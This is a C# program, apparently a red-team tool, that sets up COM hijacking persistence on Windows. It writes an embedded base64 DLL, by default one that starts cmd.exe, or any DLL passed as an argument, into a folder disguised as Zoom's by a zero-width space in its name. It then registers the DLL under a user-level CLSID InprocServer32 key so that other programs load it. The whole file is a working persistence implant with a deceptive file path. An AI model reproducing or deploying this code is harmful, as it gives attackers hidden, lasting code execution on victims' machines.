using System;
using System.IO;
using System.Threading;
using System.Diagnostics;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using Microsoft.Win32;

namespace ZoomCOMPersist
{
    class Program
    {
        static void Main(string[] args)
        {
            string b64Bytes = "";
            string filePath = "";
            if (args.Length == 0)
            {
                Console.WriteLine("No base64 bytes provided. Writing default DLL to start new cmd.exe process.");
                //dll bytes. This will create new cmd.exe process
                b64Bytes = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAAXpAKbU8VsyFPFbMhTxWzIWr3/yFHFbMiGqG3JUcVsyIaoaclZxWzIhqhoyVnFbMiGqG/JUsVsyHGlbclQxWzIU8VtyHbFbMjMq2XJUcVsyMyrk8hSxWzIzKtuyVLFbMhSaWNoU8VsyAAAAAAAAAAAAAAAAAAAAABQRQAATAEFAL9TA18AAAAAAAAAAOAAAiELAQ4YAA4AAAAQAAAAAAAAbBMAAAAQAAAAIAAAAAAAEAAQAAAAAgAABgAAAAAAAAAGAAAAAAAAAABgAAAABAAAAAAAAAIAQAEAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAPQkAABQAAAAAEAAAPgAAAAAAAAAAAAAAAAAAAAAAAAAAFAAADgBAACwIAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAhAABAAAAAAAAAAAAAAAAAIAAAaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAIQ0AAAAQAAAADgAAAAQAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAOoHAAAAIAAAAAgAAAASAAAAAAAAAAAAAAAAAABAAABALmRhdGEAAACQAwAAADAAAAACAAAAGgAAAAAAAAAAAAAAAAAAQAAAwC5yc3JjAAAA+AAAAABAAAAAAgAAABwAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAADgBAAAAUAAAAAIAAAAeAAAAAAAAAAAAAAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFWL7IN9DAF1DmicIAAQ/xVMIAAQg8QEuAEAAABdwgwAOw0EMAAQ8nUC8sPy6YYDAABVi+yLRQyD6AB0M4PoAXQgg+gBdBGD6AF0BTPAQOsw6AIGAADrBejcBQAAD7bA6x//dRD/dQjoGAAAAFnrEIN9EAAPlcAPtsBQ6AwBAABZXcIMAGoQaHAkABDoYAkAAGoA6DEGAABZhMAPhNEAAADoKAUAAIhF47MBiF3ng2X8AIM9WDMAEAAPhcUAAADHBVgzABABAAAA6F0FAACEwHRN6LMIAADobQQAAOiMBAAAaHggABBodCAAEOiECwAAWVmFwHUp6AUFAACEwHQgaHAgABBobCAAEOhgCwAAWVnHBVgzABACAAAAMtuIXefHRfz+////6D0AAACE23VD6C4HAACL8IM+AHQfVuhIBgAAWYTAdBT/dQxqAv91CIs2i87/FWggABD/1v8FGDAAEDPAQOsPil3n/3Xj6K0GAABZwzPAi03wZIkNAAAAAFlfXlvJw2oH6N0GAADMahBokCQAEOhZCAAAoRgwABCFwH8EM8DraUijGDAAEDP/R4l95INl/ADoFAQAAIhF4Il9/IM9WDMAEAJ1a+jLBAAA6IIDAADo3gcAAIMlWDMAEACDZfwA6DkAAABqAP91COhIBgAAWVkPtvD33hv2I/eJdeTHRfz+////6CIAAACLxotN8GSJDQAAAABZX15bycOLfeT/deDo9AUAAFnDi3Xk6IkEAADDagfoLQYAAMxqDGi4JAAQ6KkHAACLfQyF/3UPOT0YMAAQfwczwOnUAAAAg2X8AIP/AXQKg/8CdAWLXRDrMYtdEFNX/3UI6MQAAACL8Il15IX2D4SeAAAAU1f/dQjonf3//4vwiXXkhfYPhIcAAABTV/91COhV/f//i/CJdeSD/wF1IoX2dR5TUP91COg9/f//U1b/dQjoZP3//1NW/3UI6GoAAACF/3QFg/8DdUhTV/91COhH/f//i/CJdeSF9nQ1U1f/dQjoRAAAAIvw6ySLTeyLAVH/MGgxEAAQ/3UQ/3UM/3UI6EgDAACDxBjDi2XoM/aJdeTHRfz+////i8aLTfBkiQ0AAAAAWV9eW8nDVYvsVos1kCAAEIX2dQUzwEDrE/91EIvO/3UM/3UI/xVoIAAQ/9ZeXcIMAFWL7IN9DAF1BeiDAQAA/3UQ/3UM/3UI6LP+//+DxAxdwgwAVYvsagD/FSQgABD/dQj/FSggABBoCQQAwP8VICAAEFD/FRwgABBdw1WL7IHsJAMAAGoX6NYIAACFwHQFagJZzSmjIDEAEIkNHDEAEIkVGDEAEIkdFDEAEIk1EDEAEIk9DDEAEGaMFTgxABBmjA0sMQAQZowdCDEAEGaMBQQxABBmjCUAMQAQZowt/DAAEJyPBTAxABCLRQCjJDEAEItFBKMoMQAQjUUIozQxABCLhdz8///HBXAwABABAAEAoSgxABCjLDAAEMcFIDAAEAkEAMDHBSQwABABAAAAxwUwMAAQAQAAAGoEWGvAAMeANDAAEAIAAABqBFhrwACLDQQwABCJTAX4agRYweAAiw0AMAAQiUwF+GiUIAAQ6OH+///Jw1WL7IPsFINl9ACNRfSDZfgAUP8VCCAAEItF+DNF9IlF/P8VDCAAEDFF/P8VECAAEDFF/I1F7FD/FRQgABCLRfCNTfwzRewzRfwzwcnDiw0EMAAQVle/TuZAu74AAP//O890BIXOdSbolP///4vIO891B7lP5kC76w6FznUKDRFHAADB4BALyIkNBDAAEPfRX4kNADAAEF7DaEAzABD/FQQgABDDaEAzABDo/QYAAFnDuEgzABDDuFAzABDD6O////+LSASDCCSJSATo5////4tIBIMIAolIBMNVi+yLRQhWi0g8A8gPt0EUjVEYA9APt0EGa/AoA/I71nQZi00MO0oMcgqLQggDQgw7yHIMg8IoO9Z16jPAXl3Di8Lr+VbofAYAAIXAdCBkoRgAAAC+XDMAEItQBOsEO9B0EDPAi8rwD7EOhcB18DLAXsOwAV7D6EsGAACFwHQH6G4EAADrGOg3BgAAUOhlBgAAWYXAdAMywMPoXgYAALABw2oA6NAAAACEwFkPlcDD6GYGAACEwHUDMsDD6FoGAACEwHUH6FEGAADr7bABw+hHBgAA6EIGAACwAcNVi+zo4wUAAIXAdRmDfQwBdRP/dRCLTRRQ/3UI/xVoIAAQ/1UU/3Uc/3UY6OUFAABZWV3D6LIFAACFwHQMaGQzABDo5gUAAFnD6PQFAACFwA+E3QUAAMNqAOjhBQAAWenbBQAAVYvsg30IAHUHxgVgMwAQAeieAwAA6MEFAACEwHUEMsBdw+i0BQAAhMB1CmoA6KkFAABZ6+mwAV3DVYvsgD1hMwAQAHQEsAFdw1aLdQiF9nQFg/4BdWLoLAUAAIXAdCaF9nUiaGQzABDoVgUAAFmFwHUPaHAzABDoRwUAAFmFwHQrMsDrMIPJ/4kNZDMAEIkNaDMAEIkNbDMAEIkNcDMAEIkNdDMAEIkNeDMAEMYFYTMAEAGwAV5dw2oF6OAAAADMagho2CQAEOhcAgAAg2X8ALhNWgAAZjkFAAAAEHVdoTwAABCBuAAAABBQRQAAdUy5CwEAAGY5iBgAABB1PotFCLkAAAAQK8FQUeiz/f//WVmFwHQng3gkAHwhx0X8/v///7AB6x+LReyLADPJgTgFAADAD5TBi8HDi2Xox0X8/v///zLAi03wZIkNAAAAAFlfXlvJw1WL7OgrBAAAhcB0D4B9CAB1CTPAuVwzABCHAV3DVYvsgD1gMwAQAHQGgH0MAHUS/3UI6FAEAAD/dQjoSAQAAFlZsAFdw7iMMwAQw1WL7IHsJAMAAFNqF+glBAAAhcB0BYtNCM0pagPo+QAAAMcEJMwCAACNhdz8//9qAFDoxAMAAIPEDImFjP3//4mNiP3//4mVhP3//4mdgP3//4m1fP3//4m9eP3//2aMlaT9//9mjI2Y/f//ZoyddP3//2aMhXD9//9mjKVs/f//ZoytaP3//5yPhZz9//+LRQSJhZT9//+NRQSJhaD9///Hhdz8//8BAAEAi0D8alCJhZD9//+NRahqAFDoOgMAAItFBIPEDMdFqBUAAEDHRawBAAAAiUW0/xUAIAAQagCNWP/3241FqIlF+I2F3Pz//xrbiUX8/sP/FSQgABCNRfhQ/xUoIAAQhcB1DITbdQhqA+gEAAAAWVvJw4MlfDMAEADDU1a+YCQAELtgJAAQO/NzGVeLPoX/dAqLz/8VaCAAEP/Xg8YEO/Ny6V9eW8NTVr5oJAAQu2gkABA783MZV4s+hf90CovP/xVoIAAQ/9eDxgQ783LpX15bw8zMzMzMzMzMzMzMzMzMzGhLGgAQZP81AAAAAItEJBCJbCQQjWwkECvgU1ZXoQQwABAxRfwzxVCJZej/dfiLRfzHRfz+////iUX4jUXwZKMAAAAA8sOLTfBkiQ0AAAAAWV9fXluL5V1R8sNVi+xWi3UI/zboUAIAAP91FIkG/3UQ/3UMVmggEAAQaAQwABDo8wEAAIPEHF5dw8NVi+yDJYAzABAAg+wkgw0QMAAQAWoK6AcCAACFwA+EqQEAAINl8AAzwFNWVzPJjX3cUw+ii/NbiQeJdwSJTwgzyYlXDItF3It95IlF9IH3bnRlbItF6DVpbmVJiUX4i0XgNUdlbnWJRfwzwEBTD6KL81uNXdyJA4tF/IlzBAvHC0X4iUsIiVMMdUOLRdwl8D//Dz3ABgEAdCM9YAYCAHQcPXAGAgB0FT1QBgMAdA49YAYDAHQHPXAGAwB1EYs9hDMAEIPPAYk9hDMAEOsGiz2EMwAQi03kagdYiU38OUX0fC8zyVMPoovzW41d3IkDiXMEiUsIi038iVMMi13g98MAAgAAdA6DzwKJPYQzABDrA4td8KEQMAAQg8gCxwWAMwAQAQAAAKMQMAAQ98EAABAAD4STAAAAg8gExwWAMwAQAgAAAKMQMAAQ98EAAAAIdHn3wQAAABB0cTPJDwHQiUXsiVXwi0Xsi03wagZeI8Y7xnVXoRAwABCDyAjHBYAzABADAAAAoxAwABD2wyB0O4PIIMcFgDMAEAUAAACjEDAAELgAAAPQI9g72HUei0XsuuAAAACLTfAjwjvCdQ2DDRAwABBAiTWAMwAQX15bM8DJwzPAQMMzwDkFFDAAEA+VwMP/JTggABD/JTAgABD/JTQgABD/JUggABD/JUQgABD/JVwgABD/JUAgABD/JVggABD/JWAgABD/JVQgABD/JVAgABD/JRggABCwAcMzwMNVi+xRgz2AMwAQAXxmgX0ItAIAwHQJgX0ItQIAwHVUD65d/ItF/IPwP6iBdD+pBAIAAHUHuI4AAMDJw6kCAQAAdCqpCAQAAHUHuJEAAMDJw6kQCAAAdQe4kwAAwMnDqSAQAAB1DriPAADAycO4kAAAwMnDi0UIycMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1icAAMAnAACmJwAAkCcAAHonAABgJwAARCcAADAnAAAcJwAA/iYAAOImAAAAAAAA2iUAAOQlAAC6JQAAAAAAAEYmAAAmJgAAGiYAABAmAAC2JgAAniYAAGAmAAA0JgAAgiYAAAAAAAB6GgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAwABBwMAAQc3RhcnQgY21kLmV4ZQAAAAAAAAAAAAAAv1MDXwAAAAACAAAAWwAAANQhAADUEwAAAAAAAL9TA18AAAAADAAAABQAAAAwIgAAMBQAAAAAAAC/UwNfAAAAAA0AAAAYAgAARCIAAEQUAAAAAAAAv1MDXwAAAAAOAAAAAAAAAAAAAAAAAAAApAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABDAAENAhABABAAAAaCAAEAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABLGgAAUlNEU0Pcx4w7VB1Eo3nihtM465sBAAAAQzpcVXNlcnNcbXVycGhcRGVza3RvcFxkbGwtaGlqYWNrLXRlc3RcUmVsZWFzZVxkbGwtaGlqYWNrLXRlc3QucGRiAAAAAAAAFgAAABYAAAACAAAAFAAAAEdDVEwAEAAAIQ0AAC50ZXh0JG1uAAAAAAAgAABoAAAALmlkYXRhJDUAAAAAaCAAAAQAAAAuMDBjZmcAAGwgAAAEAAAALkNSVCRYQ0EAAAAAcCAAAAQAAAAuQ1JUJFhDWgAAAAB0IAAABAAAAC5DUlQkWElBAAAAAHggAAAEAAAALkNSVCRYSVoAAAAAfCAAAAQAAAAuQ1JUJFhQQQAAAACAIAAABAAAAC5DUlQkWFBaAAAAAIQgAAAEAAAALkNSVCRYVEEAAAAAiCAAAAgAAAAuQ1JUJFhUWgAAAACQIAAAQAEAAC5yZGF0YQAA0CEAAAQAAAAucmRhdGEkc3hkYXRhAAAA1CEAAIgCAAAucmRhdGEkenp6ZGJnAAAAXCQAAAQAAAAucnRjJElBQQAAAABgJAAABAAAAC5ydGMkSVpaAAAAAGQkAAAEAAAALnJ0YyRUQUEAAAAAaCQAAAgAAAAucnRjJFRaWgAAAABwJAAAhAAAAC54ZGF0YSR4AAAAAPQkAAA8AAAALmlkYXRhJDIAAAAAMCUAABQAAAAuaWRhdGEkMwAAAABEJQAAaAAAAC5pZGF0YSQ0AAAAAKwlAAA+AgAALmlkYXRhJDYAAAAAADAAABgAAAAuZGF0YQAAABgwAAB4AwAALmJzcwAAAAAAQAAAYAAAAC5yc3JjJDAxAAAAAGBAAACYAAAALnJzcmMkMDIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD+////AAAAAND///8AAAAA/v///wAAAABkEQAQAAAAAP7///8AAAAA0P///wAAAAD+////AAAAACoSABAAAAAAAAAAAB0SABD+////AAAAANT///8AAAAA/v///wETABAgEwAQAAAAAP7///8AAAAA2P///wAAAAD+////7RcAEAAYABBEJQAAAAAAAAAAAACsJQAAACAAAHQlAAAAAAAAAAAAAP4lAAAwIAAAhCUAAAAAAAAAAAAAwCYAAEAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAANYnAADAJwAApicAAJAnAAB6JwAAYCcAAEQnAAAwJwAAHCcAAP4mAADiJgAAAAAAANolAADkJQAAuiUAAAAAAABGJgAAJiYAABomAAAQJgAAtiYAAJ4mAABgJgAANCYAAIImAAAAAAAAS0VSTkVMMzIuZGxsAAAlAF9fc3RkX3R5cGVfaW5mb19kZXN0cm95X2xpc3QAAEgAbWVtc2V0AAA1AF9leGNlcHRfaGFuZGxlcjRfY29tbW9uAFZDUlVOVElNRTE0MC5kbGwAAGkAc3lzdGVtAAA4AF9pbml0dGVybQA5AF9pbml0dGVybV9lAEEAX3NlaF9maWx0ZXJfZGxsABkAX2NvbmZpZ3VyZV9uYXJyb3dfYXJndgAANQBfaW5pdGlhbGl6ZV9uYXJyb3dfZW52aXJvbm1lbnQAADYAX2luaXRpYWxpemVfb25leGl0X3RhYmxlAAAkAF9leGVjdXRlX29uZXhpdF90YWJsZQAXAF9jZXhpdAAAYXBpLW1zLXdpbi1jcnQtcnVudGltZS1sMS0xLTAuZGxsAJ0FVW5oYW5kbGVkRXhjZXB0aW9uRmlsdGVyAABeBVNldFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgATAkdldEN1cnJlbnRQcm9jZXNzAHwFVGVybWluYXRlUHJvY2VzcwAAfQNJc1Byb2Nlc3NvckZlYXR1cmVQcmVzZW50AEAEUXVlcnlQZXJmb3JtYW5jZUNvdW50ZXIAFAJHZXRDdXJyZW50UHJvY2Vzc0lkABgCR2V0Q3VycmVudFRocmVhZElkAADiAkdldFN5c3RlbVRpbWVBc0ZpbGVUaW1lAFoDSW5pdGlhbGl6ZVNMaXN0SGVhZAB2A0lzRGVidWdnZXJQcmVzZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAACxGb9ETuZAu/////8AAAAAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAYAAAAGAAAgAAAAAAAAAAAAAAAAAAAAQACAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAJBAAASAAAAGBAAACRAAAAAAAAAAAAAAAAAAAAAAAAADw/eG1sIHZlcnNpb249JzEuMCcgZW5jb2Rpbmc9J1VURi04JyBzdGFuZGFsb25lPSd5ZXMnPz4NCjxhc3NlbWJseSB4bWxucz0ndXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTphc20udjEnIG1hbmlmZXN0VmVyc2lvbj0nMS4wJz4NCjwvYXNzZW1ibHk+DQoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAABQBAAAKMBAwIjCHMLMwwDDhMOYw/zAEMRExUzFbMY4xmDGmMcEx2TE+MlAyCjNHM2EzljOfM6ozsTPRM9cz3TPjM+kz7zP2M/0zBDQLNBI0GTQgNCg0MDQ4NEQ0TTRSNFg0YjRsNHw0jDScNKU0xDTTNNw06TT/NDk1QjVJNU81VTVhNWc13jWCNqI20zYGNyw3OzdSN1g3XjdkN2o3cDd2N4s3oDenN603vzfJNzE4PjhiOEA5YDlqOYM5jDmROaQ5uDm9OdA58TkOOmY6azqAOoo6OTtCO0o7hTuPO5g7oTu2O7877jv3OwA8DjwXPDk8QDxTPF08YzxpPG88dTx7PIE8hzyNPJM8mTyfPK88ACAAACQAAABoMJQwmDBcMWAxaDGINKg0tDTMNNA07DTwNAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=";
            }
            else if (args.Length == 1)
            {
                b64Bytes = args[0].ToString();
            }
            else
            {
                Console.WriteLine("Incorrect number of arugments provided. Please provide base64 encoded DLL file. No argument will use the default DLL that starts a new cmd.exe process.");
            }


            //Create directory with include zero-width space
            try
            {
                filePath = Environment.GetEnvironmentVariable("appdata").ToString();
                filePath += "\\Zoom" + "\u200b";
                Directory.CreateDirectory(filePath);

                filePath += "\\bin";
                Directory.CreateDirectory(filePath);

                //write dll bytes to disk
                filePath += "\\zStartup.dll";
                File.WriteAllBytes(filePath, Convert.FromBase64String(b64Bytes));
            }
            catch (Exception e)
            {
                Console.WriteLine(" [x] {0}", e.Message);
                System.Environment.Exit(1);
            }

            //create registry key for COM persistence
            try
            {
                RegistryKey newkey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\WOW6432Node\CLSID\", true);
                newkey.CreateSubKey(@"{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}");

                RegistryKey inprocKey = Registry.CurrentUser.OpenSubKey(@"Software\Classes\WOW6432Node\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}", true);
                inprocKey.CreateSubKey("InprocServer32");

                RegistryKey setDLL = Registry.CurrentUser.OpenSubKey(@"Software\Classes\WOW6432Node\CLSID\{62BE5D10-60EB-11d0-BD3B-00A0C911CE86}\InprocServer32", true);
                setDLL.SetValue("", filePath);
                setDLL.SetValue("ThreadingModel", "Both");

                newkey.Close();
                inprocKey.Close();
                setDLL.Close();
            }
            catch (Exception e)
            {
                Console.WriteLine(" [x] {0}", e.Message);
            }
        }
    }
}
